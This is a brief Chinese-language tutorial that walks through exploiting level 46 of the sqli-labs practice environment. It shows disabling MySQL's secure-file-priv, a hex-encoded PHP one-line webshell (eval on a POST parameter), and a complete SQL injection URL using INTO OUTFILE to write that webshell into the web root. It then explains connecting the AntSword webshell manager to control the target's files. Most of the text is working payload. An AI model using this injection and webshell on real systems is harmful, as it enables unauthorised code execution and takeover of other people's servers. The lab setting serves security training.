找到mysql配置文件
python
secure-file-priv=
工作目录
python
D:\tool\huli\gui_webshell\AntSword\AntSword\antSword-master重点是tool目录后面 前面大家可能都不一样
添加数据
一句话木马
python
3C3F706870206576616C28245F504F53545B22636D64225D293B3F3E
翻译过来
<?php eval($_POST["cmd"]);?>示例天书第46关上传木马
python
/?sort=1%20into%20outfile%20"D:\\phpstudy_pro\\WWW\\sql\\sqli-labs-master\\Less-46\\test1.php"%20lines%20terminated%20by%200x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e选择你上传一句话木马的url地址 具体到 你上传的文件名
这个参数就是连接密码
完成操作后 可以操作对方的目录
